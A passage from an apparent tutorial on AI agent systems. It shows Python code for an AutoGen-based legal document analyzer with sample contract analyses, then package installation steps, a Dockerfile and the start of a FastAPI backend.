853 The LegalAnalysisCoordinator (me) will coordinate your work. Please be specific, thorough, and actionable in your analysis.
854 """
855
        # Start the group chat
        self.user_proxy.initiate_chat(
            manager,
            message=analysis_prompt
        )

        # Extract the final summary from the group chat transcript.
        # The group chat records each message with its speaker's name in groupchat.messages.
        final_summary = None
        for message in reversed(groupchat.messages):
            if message.get("name") == "LegalSummarizer" and message.get("content"):
                final_summary = message["content"]
                break

        if not final_summary:
            # Use the last substantial agent response if no clear summary
            for message in reversed(groupchat.messages):
                content = message.get("content") or ""
                if message.get("name") != self.user_proxy.name and len(content) > 500:
                    final_summary = content
                    break
875
        # Step 8: Generate document summary
        summary = {
            "executive_summary": "See full summary below",
            "detailed_summary": final_summary
        }

        # Step 9: Verify citations
        citation_verification = self.verify_citations(document_text)

        # Compile the complete analysis results
        analysis_result = {
            "analysis_id": analysis_id,
            "timestamp": datetime.datetime.now().isoformat(),
            "document_type": document_type,
            "jurisdiction": jurisdiction,
            "industry": industry,
            "structure": structure,
            "entities": entities,
            "rights_obligations": rights_obligations,
            "relevant_case_law": case_law,
            "applicable_regulations": regulations,
            "compliance_assessment": compliance,
            "legal_issues": issues,
            "citation_verification": citation_verification,
            "summary": summary,
            "metadata": {
                "document_length": len(document_text),
                "analysis_version": "1.0"
            }
        }

        # Save to analysis history
        self.analysis_history[analysis_id] = {
            "timestamp": datetime.datetime.now().isoformat(),
            "document_type": document_type,
            "jurisdiction": jurisdiction,
            "industry": industry,
            "summary": summary.get("executive_summary", "")
        }

        # Save analysis history
        try:
            with open(self.history_path, 'w') as f:
                json.dump(self.analysis_history, f, indent=2)
            print("Analysis history saved successfully")
        except Exception as e:
            print(f"Error saving analysis history: {e}")

        return analysis_result

    def get_analysis_history(self) -> Dict[str, Dict[str, Any]]:
        """
        Get the history of document analyses.

        Returns:
            Dictionary with analysis history
        """
        return self.analysis_history

    def compare_documents(self, document1_text: str, document2_text: str, comparison_type: str = "general") -> Dict[str, Any]:
        """
        Compare two legal documents and identify differences.

        Args:
            document1_text: Text of first document
            document2_text: Text of second document
            comparison_type: Type of comparison (general, clause, version)

        Returns:
            Dictionary with comparison results
        """
        try:
            # Extract structure for both documents
            structure1 = self.extract_document_structure(document1_text)
            structure2 = self.extract_document_structure(document2_text)

            # Prepare comparison prompt based on comparison type
            if comparison_type == "clause":
                # Detailed clause-by-clause comparison
                comparison_prompt = f"""Compare these two legal documents clause by clause. Identify:
                1. Clauses that appear in both documents but have differences
                2. Clauses that appear only in Document 1
                3. Clauses that appear only in Document 2
                4. Changes in legal obligations, rights, or liabilities
                5. The legal implications of these differences

                Document 1 structure:
                {json.dumps(structure1, indent=2)}

                Document 2 structure:
                {json.dumps(structure2, indent=2)}

                Provide a clause-by-clause comparison with specific references to the differences and their legal implications.
                """
            elif comparison_type == "version":
                # Version comparison (e.g., different versions of same document)
                comparison_prompt = f"""Compare these two versions of the legal document. Identify:
                1. All changes between versions, highlighting additions, deletions, and modifications
                2. The significance of each change
                3. How the changes affect legal obligations, rights, or liabilities
                4. Whether the changes strengthen or weaken any party's position
                5. Any new risks or opportunities introduced by the changes

                Original document:
                {document1_text[:5000]}

                New version:
                {document2_text[:5000]}

                Focus on substantive changes rather than formatting differences.
                """
            else:
                # General comparison
                comparison_prompt = f"""Compare these two legal documents. Identify:
                1. Key similarities and differences
                2. Differences in scope, obligations, rights, and liabilities
                3. Relative advantages and disadvantages for involved parties
                4. Which document provides better protections and for whom
                5. Recommendations based on the comparison

                Document 1:
                Type: {structure1.get('document_type', 'Unknown')}
                {document1_text[:3000]}

                Document 2:
                Type: {structure2.get('document_type', 'Unknown')}
                {document2_text[:3000]}

                Provide a comprehensive comparison with specific references to important differences.
                """

            # Use OpenAI to generate comparison.
            # JSON mode requires the word "JSON" to appear in the messages, so the
            # system prompt asks for a JSON object and names the keys callers read.
            response = client.chat.completions.create(
                model="gpt-4-turbo",
                messages=[
                    {"role": "system", "content": (
                        "You are a legal document comparison specialist who identifies and analyzes differences between legal documents. "
                        "Respond with a JSON object that includes 'key_differences' and 'recommendations' lists."
                    )},
                    {"role": "user", "content": comparison_prompt}
                ],
                temperature=0.3,
                response_format={"type": "json_object"}
            )

            # Parse the response
            comparison = json.loads(response.choices[0].message.content)

            # Add document metadata to comparison
            comparison["document1_metadata"] = {
                "document_type": structure1.get("document_type", "Unknown"),
                "jurisdiction": structure1.get("jurisdiction", "Unknown"),
                "date": structure1.get("date", "Unknown"),
                "parties": structure1.get("parties", [])
            }

            comparison["document2_metadata"] = {
                "document_type": structure2.get("document_type", "Unknown"),
                "jurisdiction": structure2.get("jurisdiction", "Unknown"),
                "date": structure2.get("date", "Unknown"),
                "parties": structure2.get("parties", [])
            }

            return comparison

        except Exception as e:
            print(f"Error comparing documents: {e}")
            return {
                "error": str(e),
                "comparison_type": comparison_type,
                "document1_excerpt": document1_text[:100] + "...",
                "document2_excerpt": document2_text[:100] + "..."
            }

# Example usage
if __name__ == "__main__":
    # Create the legal document analyzer
    legal_analyzer = LegalDocumentAnalyzer()

    # Example contract
    example_contract = """
    SERVICE AGREEMENT

    This Service Agreement (the "Agreement") is entered into as of January 15, 2023 (the "Effective Date"), by and between ABC Technology Solutions, Inc., a Delaware corporation with its principal place of business at 123 Tech Lane, San Francisco, CA 94105 ("Provider"), and XYZ Corporation, a Nevada corporation with its principal place of business at 456 Business Avenue, Las Vegas, NV 89101 ("Client").

    WHEREAS, Provider is in the business of providing cloud computing and software development services; and

    WHEREAS, Client desires to engage Provider to provide certain services as set forth herein.

    NOW, THEREFORE, in consideration of the mutual covenants and agreements contained herein, the parties agree as follows:

    1. SERVICES

    1.1 Services. Provider shall provide to Client the services (the "Services") described in each Statement of Work executed by the parties and attached hereto as Exhibit A. Additional Statements of Work may be added to this Agreement upon mutual written agreement of the parties.

    1.2 Change Orders. Either party may request changes to the scope of Services by submitting a written change request. No change shall be effective until mutually agreed upon by both parties in writing.

    2. TERM AND TERMINATION

    2.1 Term. This Agreement shall commence on the Effective Date and shall continue for a period of three (3) years, unless earlier terminated as provided herein (the "Initial Term"). Thereafter, this Agreement shall automatically renew for successive one (1) year periods (each, a "Renewal Term"), unless either party provides written notice of non-renewal at least ninety (90) days prior to the end of the then-current term.

    2.2 Termination for Convenience. Client may terminate this Agreement or any Statement of Work, in whole or in part, for convenience upon thirty (30) days' prior written notice to Provider. In the event of such termination, Client shall pay Provider for all Services provided up to the effective date of termination.

    2.3 Termination for Cause. Either party may terminate this Agreement immediately upon written notice if the other party: (a) commits a material breach of this Agreement and fails to cure such breach within thirty (30) days after receiving written notice thereof; or (b) becomes insolvent, files for bankruptcy, or makes an assignment for the benefit of creditors.

    3. COMPENSATION

    3.1 Fees. Client shall pay Provider the fees set forth in each Statement of Work.

    3.2 Invoicing and Payment. Provider shall invoice Client monthly for Services performed. Client shall pay all undisputed amounts within thirty (30) days of receipt of invoice. Late payments shall accrue interest at the rate of 1.5% per month or the highest rate permitted by law, whichever is lower.

    3.3 Taxes. All fees are exclusive of taxes. Client shall be responsible for all sales, use, and excise taxes, and any other similar taxes, duties, and charges imposed by any federal, state, or local governmental entity.

    4. INTELLECTUAL PROPERTY

    4.1 Client Materials. Client shall retain all right, title, and interest in and to all materials provided by Client to Provider (the "Client Materials").

    4.2 Provider Materials. Provider shall retain all right, title, and interest in and to all materials that Provider owned prior to the Effective Date or develops independently of its obligations under this Agreement (the "Provider Materials").

    4.3 Work Product. Upon full payment of all amounts due under this Agreement, Provider hereby assigns to Client all right, title, and interest in and to all materials developed specifically for Client under this Agreement (the "Work Product"), excluding any Provider Materials.

    4.4 License to Provider Materials. Provider hereby grants to Client a non-exclusive, non-transferable, worldwide license to use the Provider Materials solely to the extent necessary to use the Work Product.

    5. CONFIDENTIALITY

    5.1 Definition. "Confidential Information" means all non-public information disclosed by one party (the "Disclosing Party") to the other party (the "Receiving Party"), whether orally or in writing, that is designated as confidential or that reasonably should be understood to be confidential given the nature of the information and the circumstances of disclosure.

    5.2 Obligations. The Receiving Party shall: (a) protect the confidentiality of the Disclosing Party's Confidential Information using the same degree of care that it uses to protect the confidentiality of its own confidential information of like kind (but in no event less than reasonable care); (b) not use any Confidential Information for any purpose outside the scope of this Agreement; and (c) not disclose Confidential Information to any third party without prior written consent.

    5.3 Exclusions. Confidential Information shall not include information that: (a) is or becomes generally known to the public; (b) was known to the Receiving Party prior to its disclosure by the Disclosing Party; (c) is received from a third party without restriction; or (d) was independently developed without use of Confidential Information.

    6. REPRESENTATIONS AND WARRANTIES

    6.1 Provider Warranties. Provider represents and warrants that: (a) it has the legal right to enter into this Agreement and perform its obligations hereunder; (b) the Services will be performed in a professional and workmanlike manner in accordance with generally accepted industry standards; and (c) the Services and Work Product will not infringe the intellectual property rights of any third party.

    6.2 Disclaimer. EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, PROVIDER MAKES NO WARRANTIES OF ANY KIND, WHETHER EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, AND SPECIFICALLY DISCLAIMS ALL IMPLIED WARRANTIES, INCLUDING ANY WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, TO THE MAXIMUM EXTENT PERMITTED BY APPLICABLE LAW.

    7. LIMITATION OF LIABILITY

    7.1 Exclusion of Indirect Damages. NEITHER PARTY SHALL BE LIABLE TO THE OTHER PARTY FOR ANY INDIRECT, INCIDENTAL, CONSEQUENTIAL, SPECIAL, PUNITIVE, OR EXEMPLARY DAMAGES ARISING OUT OF OR RELATED TO THIS AGREEMENT, EVEN IF THE PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

    7.2 Cap on Liability. EACH PARTY'S TOTAL CUMULATIVE LIABILITY ARISING OUT OF OR RELATED TO THIS AGREEMENT SHALL NOT EXCEED THE TOTAL AMOUNT PAID BY CLIENT UNDER THIS AGREEMENT DURING THE TWELVE (12) MONTHS IMMEDIATELY PRECEDING THE EVENT GIVING RISE TO LIABILITY.

    7.3 Exceptions. The limitations in Sections 7.1 and 7.2 shall not apply to: (a) breaches of confidentiality obligations; (b) infringement of intellectual property rights; (c) breaches of Section 8 (Indemnification); or (d) a party's gross negligence, fraud, or willful misconduct.

    8. INDEMNIFICATION

    8.1 Provider Indemnification. Provider shall defend, indemnify, and hold harmless Client from and against any claim, demand, suit, or proceeding made or brought against Client by a third party alleging that the Services or Work Product infringes such third party's intellectual property rights (an "Infringement Claim").

    8.2 Client Indemnification. Client shall defend, indemnify, and hold harmless Provider from and against any claim, demand, suit, or proceeding made or brought against Provider by a third party arising out of Client's use of the Services or Work Product in violation of this Agreement or applicable law.

    9. GENERAL

    9.1 Independent Contractors. The parties are independent contractors. This Agreement does not create a partnership, franchise, joint venture, agency, fiduciary, or employment relationship between the parties.

    9.2 Notices. All notices under this Agreement shall be in writing and shall be deemed given when delivered personally, by email (with confirmation of receipt), or by certified mail (return receipt requested) to the address specified below or such other address as may be specified in writing.

    9.3 Assignment. Neither party may assign this Agreement without the prior written consent of the other party; provided, however, that either party may assign this Agreement to a successor in the event of a merger, acquisition, or sale of all or substantially all of its assets.

    9.4 Governing Law. This Agreement shall be governed by the laws of the State of California without regard to its conflict of laws provisions.

    9.5 Dispute Resolution. Any dispute arising out of or relating to this Agreement shall be resolved by binding arbitration in San Francisco, California, in accordance with the Commercial Arbitration Rules of the American Arbitration Association.

    9.6 Entire Agreement. This Agreement constitutes the entire agreement between the parties regarding the subject matter hereof and supersedes all prior or contemporaneous agreements, understandings, and communication, whether written or oral.

    9.7 Severability. If any provision of this Agreement is held to be unenforceable or invalid, such provision shall be changed and interpreted to accomplish the objectives of such provision to the greatest extent possible under applicable law, and the remaining provisions shall continue in full force and effect.

    9.8 Waiver. No waiver of any provision of this Agreement shall be effective unless in writing and signed by the party against whom the waiver is sought to be enforced. No failure or delay by either party in exercising any right under this Agreement shall constitute a waiver of that right.

    9.9 Force Majeure. Neither party shall be liable for any failure or delay in performance under this Agreement due to causes beyond its reasonable control, including acts of God, natural disasters, terrorism, riots, or war.

    9.10 Survival. The provisions of Sections 4, 5, 6.2, 7, 8, and 9 shall survive the termination or expiration of this Agreement.

    IN WITNESS WHEREOF, the parties have executed this Agreement as of the Effective Date.

    ABC TECHNOLOGY SOLUTIONS, INC.

    By: ______________________________
    Name: John Smith
    Title: Chief Executive Officer

    XYZ CORPORATION

    By: ______________________________
    Name: Jane Doe
    Title: Chief Technology Officer
    """

    # Analyze the document
    analysis = legal_analyzer.analyze_document(
        document_text=example_contract,
        document_type="Service Agreement",
        industry="Technology"
    )

    print("=== Document Analysis ===")
    print(f"Analysis ID: {analysis['analysis_id']}")
    print(f"Document Type: {analysis['document_type']}")

    # Print structure overview
    structure = analysis.get("structure", {})
    print("\nDocument Structure:")
    print(f"Type: {structure.get('document_type', 'Unknown')}")
    print(f"Jurisdiction: {structure.get('jurisdiction', 'Unknown')}")
    print(f"Date: {structure.get('date', 'Unknown')}")
    print(f"Parties: {', '.join(str(p) for p in structure.get('parties', []))}")

    # Print key legal issues
    issues = analysis.get("legal_issues", {}).get("issues", [])
    print("\nKey Legal Issues:")
    for issue in issues[:3]:  # Print top 3 issues
        print(f"- {issue.get('description', 'Unknown issue')} (Severity: {issue.get('severity', 'Unknown')})")

    # Print compliance assessment
    compliance = analysis.get("compliance_assessment", {})
    print(f"\nCompliance Score: {compliance.get('compliance_score', 'N/A')}")

    # Print relevant case law
    case_law = analysis.get("relevant_case_law", [])
    print("\nRelevant Case Law:")
    for case in case_law[:2]:  # Print top 2 cases
        print(f"- {case.get('case_name', 'Unknown case')} ({case.get('citation', 'No citation')})")

    # Print executive summary
    summary = analysis.get("summary", {})
    exec_summary = summary.get("executive_summary", "No summary available")
    print("\nExecutive Summary:")
    print(exec_summary[:500] + "..." if len(exec_summary) > 500 else exec_summary)
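
The summary-extraction step inside `analyze_document` can be pulled out into a small pure function, which makes it testable without running a group chat. The following is a minimal sketch, assuming each message is a dict with `name` and `content` keys; `extract_final_summary` and its parameters are hypothetical names, not part of AutoGen or of the analyzer above.

```python
from typing import Any, Dict, List, Optional


def extract_final_summary(
    messages: List[Dict[str, Any]],
    summarizer_name: str = "LegalSummarizer",
    min_fallback_chars: int = 500,
) -> Optional[str]:
    """Return the summarizer's last non-empty message, else a long fallback."""
    # First pass: newest message whose speaker name matches the summarizer.
    for message in reversed(messages):
        content = message.get("content")
        name = message.get("name") or ""
        if summarizer_name in name and isinstance(content, str) and content.strip():
            return content
    # Second pass: newest message long enough to count as substantial.
    for message in reversed(messages):
        content = message.get("content")
        if isinstance(content, str) and len(content) > min_fallback_chars:
            return content
    return None


# Hypothetical chat history for illustration only.
history = [
    {"name": "DocumentParser", "content": "Structure looks standard."},
    {"name": "LegalSummarizer", "content": "Summary: low overall risk."},
    {"name": "IssueSpotter", "content": None},
]
print(extract_final_summary(history))
```

Treating `None` and empty content as "no message" matters here, because tool-call messages in a chat history can carry no text at all.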

Usage Example:

python
from legal_document_analyzer import LegalDocumentAnalyzer

# Initialize the analyzer
legal_analyzer = LegalDocumentAnalyzer()

# Sample NDA document
nda_document = """
MUTUAL NON-DISCLOSURE AGREEMENT

This Mutual Non-Disclosure Agreement (this "Agreement") is made effective as of May 10, 2023 (the "Effective Date") by and between Alpha Innovations, LLC, a Delaware limited liability company with its principal place of business at 567 Innovation Way, Boston, MA 02110 ("Company A"), and Beta Technologies Inc., a California corporation with its principal place of business at 890 Tech Boulevard, San Jose, CA 95110 ("Company B").

1. PURPOSE
The parties wish to explore a potential business relationship in connection with a joint development project (the "Purpose"). This Agreement is intended to allow the parties to continue to discuss and evaluate the Purpose while protecting the parties' Confidential Information (as defined below) against unauthorized use or disclosure.

2. DEFINITION OF CONFIDENTIAL INFORMATION
"Confidential Information" means any information disclosed by either party ("Disclosing Party") to the other party ("Receiving Party"), either directly or indirectly, in writing, orally or by inspection of tangible objects, which is designated as "Confidential," "Proprietary" or some similar designation, or that should reasonably be understood to be confidential given the nature of the information and the circumstances of disclosure. Confidential Information includes, without limitation, technical data, trade secrets, know-how, research, product plans, products, services, customer lists, markets, software, developments, inventions, processes, formulas, technology, designs, drawings, engineering, hardware configuration information, marketing, financial or other business information. Confidential Information shall not include any information that (i) was publicly known prior to the time of disclosure; (ii) becomes publicly known after disclosure through no action or inaction of the Receiving Party; (iii) is already in the possession of the Receiving Party at the time of disclosure; (iv) is obtained by the Receiving Party from a third party without a breach of such third party's obligations of confidentiality; or (v) is independently developed by the Receiving Party without use of or reference to the Disclosing Party's Confidential Information.

3. NON-USE AND NON-DISCLOSURE
The Receiving Party shall not use any Confidential Information of the Disclosing Party for any purpose except to evaluate and engage in discussions concerning the Purpose. The Receiving Party shall not disclose any Confidential Information of the Disclosing Party to third parties or to the Receiving Party's employees, except to those employees who are required to have the information in order to evaluate or engage in discussions concerning the Purpose and who have signed confidentiality agreements with the Receiving Party with terms no less restrictive than those herein.

4. MAINTENANCE OF CONFIDENTIALITY
The Receiving Party shall take reasonable measures to protect the secrecy of and avoid disclosure and unauthorized use of the Confidential Information of the Disclosing Party. Without limiting the foregoing, the Receiving Party shall take at least those measures that it takes to protect its own most highly confidential information and shall promptly notify the Disclosing Party of any unauthorized use or disclosure of Confidential Information of which it becomes aware. The Receiving Party shall reproduce the Disclosing Party's proprietary rights notices on any copies of Confidential Information, in the same manner in which such notices were set forth in or on the original.

5. RETURN OF MATERIALS
All documents and other tangible objects containing or representing Confidential Information that have been disclosed by either party to the other party, and all copies thereof which are in the possession of the other party, shall be and remain the property of the Disclosing Party and shall be promptly returned to the Disclosing Party or destroyed upon the Disclosing Party's written request.

6. NO LICENSE
Nothing in this Agreement is intended to grant any rights to either party under any patent, copyright, trade secret or other intellectual property right of the other party, nor shall this Agreement grant any party any rights in or to the Confidential Information of the other party except as expressly set forth herein.

7. TERM AND TERMINATION
This Agreement shall remain in effect for a period of three (3) years from the Effective Date. Notwithstanding the foregoing, the Receiving Party's obligations with respect to the Confidential Information of the Disclosing Party shall survive for a period of five (5) years from the date of disclosure.

8. REMEDIES
The Receiving Party acknowledges that unauthorized disclosure of the Disclosing Party's Confidential Information could cause substantial harm to the Disclosing Party for which damages alone might not be a sufficient remedy. Accordingly, in addition to all other remedies, the Disclosing Party shall be entitled to seek specific performance and injunctive or other equitable relief as a remedy for any breach or threatened breach of this Agreement.

9. MISCELLANEOUS
This Agreement shall bind and inure to the benefit of the parties hereto and their successors and assigns. This Agreement shall be governed by the laws of the State of New York, without reference to conflict of laws principles. This Agreement contains the entire agreement between the parties with respect to the subject matter hereof, and neither party shall have any obligation, express or implied by law, with respect to trade secret or proprietary information of the other party except as set forth herein. Any failure to enforce any provision of this Agreement shall not constitute a waiver thereof or of any other provision. This Agreement may not be amended, nor any obligation waived, except by a writing signed by both parties hereto.

IN WITNESS WHEREOF, the parties have executed this Agreement as of the Effective Date.

ALPHA INNOVATIONS, LLC

By: _________________________
Name: Robert Johnson
Title: Chief Executive Officer

BETA TECHNOLOGIES INC.

By: _________________________
Name: Sarah Williams
Title: President
"""

# Analyze the NDA document
analysis_result = legal_analyzer.analyze_document(
    document_text=nda_document,
    document_type="Non-Disclosure Agreement",
    jurisdiction="United States",
    industry="Technology"
)

# Print key findings
print("=== NDA DOCUMENT ANALYSIS ===")
print(f"Analysis ID: {analysis_result['analysis_id']}")
print(f"Document Type: {analysis_result['document_type']}")
print(f"Jurisdiction: {analysis_result['jurisdiction']}")

# Print document structure
structure = analysis_result.get("structure", {})
print("\nDOCUMENT STRUCTURE:")
print(f"Parties: {', '.join(str(p) for p in structure.get('parties', []))}")
print(f"Effective Date: {structure.get('date', 'Unknown')}")
print(f"Term: {structure.get('term', 'Unknown')}")

# Print key obligations
obligations = analysis_result.get("rights_obligations", {}).get("obligations", [])
print("\nKEY OBLIGATIONS:")
for obligation in obligations[:3]:  # Print top 3 obligations
    print(f"- {obligation.get('text', 'Unknown')}")
    print(f"  Subject: {obligation.get('subject', 'Unknown')}")

# Print legal issues
issues = analysis_result.get("legal_issues", {}).get("issues", [])
print("\nLEGAL ISSUES AND RISKS:")
for issue in issues[:3]:  # Print top 3 issues
    print(f"- {issue.get('description', 'Unknown issue')}")
    print(f"  Severity: {issue.get('severity', 'Unknown')}")
    print(f"  Recommendation: {issue.get('recommended_remediation', 'N/A')}")

# Print compliance assessment
compliance = analysis_result.get("compliance_assessment", {})
print("\nCOMPLIANCE ASSESSMENT:")
print(f"Overall Compliance Score: {compliance.get('compliance_score', 'N/A')}")

# Print excerpt from detailed summary.
# detailed_summary is present but None when no summary was produced,
# so fall back with `or` rather than a .get() default.
summary = analysis_result.get("summary", {}).get("detailed_summary") or "No summary available"
print("\nANALYSIS SUMMARY:")
summary_excerpt = summary[:500] + "..." if len(summary) > 500 else summary
print(summary_excerpt)

# Compare with another NDA (simplified example)
other_nda = """
CONFIDENTIALITY AGREEMENT

This Confidentiality Agreement (this "Agreement") is made as of June 1, 2023 by and between Acme Corp., a Nevada corporation ("Company A") and XYZ Enterprises, a Delaware LLC ("Company B").

1. CONFIDENTIAL INFORMATION
"Confidential Information" means all non-public information that Company A designates as being confidential or which under the circumstances surrounding disclosure ought to be treated as confidential by Company B. "Confidential Information" includes, without limitation, information relating to released or unreleased Company A software or hardware products, marketing or promotion of any Company A product, business policies or practices, and information received from others that Company A is obligated to treat as confidential.

2. EXCLUSIONS
"Confidential Information" excludes information that: (i) is or becomes generally known through no fault of Company B; (ii) was known to Company B prior to disclosure; (iii) is rightfully obtained by Company B from a third party without restriction; or (iv) is independently developed by Company B without use of Confidential Information.

3. OBLIGATIONS
Company B shall hold Company A's Confidential Information in strict confidence and shall not disclose such Confidential Information to any third party. Company B shall take reasonable security precautions, at least as great as the precautions it takes to protect its own confidential information.

4. TERM
This Agreement shall remain in effect for 2 years from the date hereof.

5. GOVERNING LAW
This Agreement shall be governed by the laws of the State of California.

IN WITNESS WHEREOF, the parties hereto have executed this Agreement.

ACME CORP.
By: ________________________

XYZ ENTERPRISES
By: ________________________
"""

# Compare the two NDAs
comparison = legal_analyzer.compare_documents(
    document1_text=nda_document,
    document2_text=other_nda,
    comparison_type="clause"
)

# Print comparison highlights
print("\n=== NDA COMPARISON ===")
print("\nKEY DIFFERENCES:")
differences = comparison.get("key_differences", [])
for diff in differences[:3]:  # Print top 3 differences
    print(f"- {diff}")

print("\nRECOMMENDATIONS:")
recommendations = comparison.get("recommendations", [])
for rec in recommendations[:2]:  # Print top 2 recommendations
    print(f"- {rec}")
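
The usage example reads `key_differences` and `recommendations` from the comparison result, but a model response is not guaranteed to contain those keys or even to be valid JSON. The sketch below shows one way to normalize the raw response text before the caller touches it; `normalize_comparison` is a hypothetical helper, and the two key names are taken from the example above rather than from any fixed schema.

```python
import json
from typing import Any, Dict


def normalize_comparison(raw: str) -> Dict[str, Any]:
    """Parse model output and guarantee the keys the caller reads."""
    try:
        data = json.loads(raw)
    except (TypeError, ValueError) as exc:
        # json.JSONDecodeError is a ValueError; TypeError covers raw=None.
        return {"error": f"invalid JSON: {exc}", "key_differences": [], "recommendations": []}

    # The model may return a bare list or scalar instead of an object.
    if not isinstance(data, dict):
        data = {"raw": data}

    # Make both expected keys present and list-valued.
    for key in ("key_differences", "recommendations"):
        value = data.get(key)
        if value is None:
            data[key] = []
        elif not isinstance(value, list):
            data[key] = [value]
    return data


result = normalize_comparison('{"key_differences": "Term is 3 years vs 2 years"}')
for diff in result["key_differences"]:
    print(f"- {diff}")
```

With this in place, slicing such as `differences[:3]` behaves the same whether the model returned a list, a single string, or nothing for that key.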

This Legal Document Analyzer agent template demonstrates key legal tech patterns:

  1. Document Structure Analysis: Extracts hierarchical structure and key provisions from legal documents
  2. Legal Research Integration: Finds relevant case law and precedents
  3. Compliance Assessment: Identifies regulatory requirements and compliance issues
  4. Issue Spotting: Detects potential legal risks and ambiguities
  5. Document Comparison: Compares legal documents and identifies material differences
  6. Citation Verification: Validates legal citations
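
For the document comparison pattern, the `version` mode sends only the first 5,000 characters of each document to the model, so changes later in a long contract are never seen. One complementary approach, sketched here with the standard library's `difflib` rather than anything in the analyzer itself, is to compute a line-level diff locally and pass only the changed hunks to the model. The function name `changed_lines` and the sample texts are illustrative assumptions.

```python
import difflib
from typing import List


def changed_lines(old_text: str, new_text: str, context: int = 1) -> List[str]:
    """Return unified-diff hunks between two document versions."""
    diff = difflib.unified_diff(
        old_text.splitlines(),
        new_text.splitlines(),
        fromfile="original",
        tofile="revised",
        n=context,      # lines of unchanged context around each change
        lineterm="",    # inputs have no trailing newlines, so add none
    )
    # The first two lines are the '---'/'+++' file headers; skip them.
    # For identical inputs the diff is empty and so is the result.
    return list(diff)[2:]


old = "4. TERM\nThis Agreement shall remain in effect for 2 years."
new = "4. TERM\nThis Agreement shall remain in effect for 3 years."
for line in changed_lines(old, new):
    print(line)
```

Lines prefixed with `-` come from the original and lines prefixed with `+` from the revision, which gives the model a compact, position-independent view of what changed.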

5. Implementation Guide: Setting Up Your AI Agent System

Installing the Required Dependencies

A large-scale AI agent system rests on a small set of core packages. The steps below install the base requirements first, then the additional packages for each of our tech stack configurations.

Base Requirements (All Configurations)

bash
# Create and activate a virtual environment
python -m venv agent_env
source agent_env/bin/activate  # On Windows: agent_env\Scripts\activate

# Install base dependencies
# (pyautogen provides the `autogen` module used by the agent code in this guide)
pip install -U pip setuptools wheel
pip install -U openai pyautogen langchain langchain-community
pip install -U numpy pandas matplotlib seaborn
pip install -U pydantic python-dotenv
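
After installing, it can help to confirm that the packages actually landed in the active virtual environment. The following is a minimal sketch using only the standard library's `importlib.metadata`; the helper name `installed_versions` is hypothetical, and the package list is a subset of the base requirements above.

```python
from importlib import metadata
from typing import Dict, Iterable, Optional


def installed_versions(packages: Iterable[str]) -> Dict[str, Optional[str]]:
    """Map each distribution name to its installed version, or None if missing."""
    versions: Dict[str, Optional[str]] = {}
    for name in packages:
        try:
            versions[name] = metadata.version(name)
        except metadata.PackageNotFoundError:
            versions[name] = None
    return versions


if __name__ == "__main__":
    required = ["openai", "langchain", "numpy", "pandas", "pydantic", "python-dotenv"]
    for name, version in installed_versions(required).items():
        print(f"{name}: {version or 'NOT INSTALLED'}")
```

The lookup uses distribution names as passed to `pip install` (for example `python-dotenv`), not import names (`dotenv`).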

Kubernetes + Ray Serve + AutoGen + LangChain

For distributed AI workloads with horizontal scaling capabilities:

bash
# Install Ray and Kubernetes dependencies
# (quote extras so shells such as zsh do not treat the brackets as a glob)
pip install -U "ray[serve,tune,data,default]"
pip install -U kubernetes
pip install -U fastapi uvicorn
pip install -U mlflow optuna

# Install AutoGen with integrations
pip install -U "pyautogen[retrievechat,graph]"

# Install monitoring tools
pip install -U prometheus-client grafana-api

Apache Kafka + FastAPI + AutoGen + ChromaDB

For real-time AI pipelines with event-driven architecture:

bash
# Install Kafka and API dependencies
pip install -U confluent-kafka aiokafka
pip install -U fastapi uvicorn
pip install -U redis httpx

# Install vector database
pip install -U chromadb langchain-chroma

# Install monitoring and observability
pip install -U opentelemetry-api opentelemetry-sdk
pip install -U opentelemetry-exporter-otlp

Django/Flask + Celery + AutoGen + Pinecone

For task orchestration and asynchronous processing:

bash
# Install web framework and task queue
pip install -U django djangorestframework django-cors-headers
# Or for Flask-based setup:
# pip install -U flask flask-restful flask-cors

pip install -U celery redis flower

# Install vector database
# (the Pinecone SDK was published as pinecone-client in older releases)
pip install -U pinecone langchain-pinecone

# Install schema validation and background tools
pip install -U marshmallow pydantic
pip install -U gunicorn psycopg2-binary

Airflow + AutoGen + OpenAI Functions + Snowflake

For enterprise AI automation and data pipeline orchestration:

bash
# Install Airflow with recommended extras
# (quote extras so shells such as zsh do not treat the brackets as a glob)
pip install -U "apache-airflow[crypto,celery,postgres,redis,ssh]"

# Install database connectors
pip install -U snowflake-connector-python
pip install -U snowflake-sqlalchemy
pip install -U snowflake-ml-python

# Install experiment tracking
pip install -U mlflow boto3

Docker Environment Setup

For containerized deployment, create a Dockerfile for your agent service:

dockerfile
FROM python:3.10-slim

WORKDIR /app

# Install system dependencies
RUN apt-get update && apt-get install -y \
    build-essential \
    curl \
    software-properties-common \
    git \
    && rm -rf /var/lib/apt/lists/*

# Copy requirements file
COPY requirements.txt .

# Install Python dependencies
RUN pip install --no-cache-dir --upgrade pip && \
    pip install --no-cache-dir -r requirements.txt

# Copy application code
COPY . .

# Expose the port your application runs on
EXPOSE 8000

# Set environment variables
ENV PYTHONUNBUFFERED=1

# Run the application
CMD ["uvicorn", "main:app", "--host", "0.0.0.0", "--port", "8000"]

Structuring the Backend with FastAPI or Django

When building a large-scale AI agent system, the backend structure is crucial for maintainability, scalability, and performance. Let's explore both FastAPI and Django approaches:

FastAPI Backend for AI Agents

FastAPI is ideal for high-performance, asynchronous API services that need to handle many concurrent agent interactions.

python
# main.py - Entry point for FastAPI application
import os
import json
import logging
from typing import Dict, List, Any, Optional

import uvicorn
from fastapi import FastAPI, Depends, HTTPException, BackgroundTasks
from fastapi.middleware.cors import CORSMiddleware
from pydantic import BaseModel

from agent_system.core import AgentOrchestrator
from agent_system.models import AgentRequest, AgentResponse
from agent_system.auth import get_api_key, get_current_user
from agent_system.config import Settings

# Initialize settings and logging
settings = Settings()
logging.basicConfig(
    level=settings.log_level,
    format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
)
logger = logging.getLogger("agent_api")

# Initialize FastAPI app
app = FastAPI(
    title="AI Agent System API",
    description="API for interacting with an AI agent system",
    version="1.0.0",
)

# Add CORS middleware
app.add_middleware(
    CORSMiddleware,
    allow_origins=settings.cors_origins,
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)

# Initialize agent orchestrator
agent_orchestrator = AgentOrchestrator(settings=settings)

# API routes

@app.post("/api/v1/agents/execute", response_model=AgentResponse)
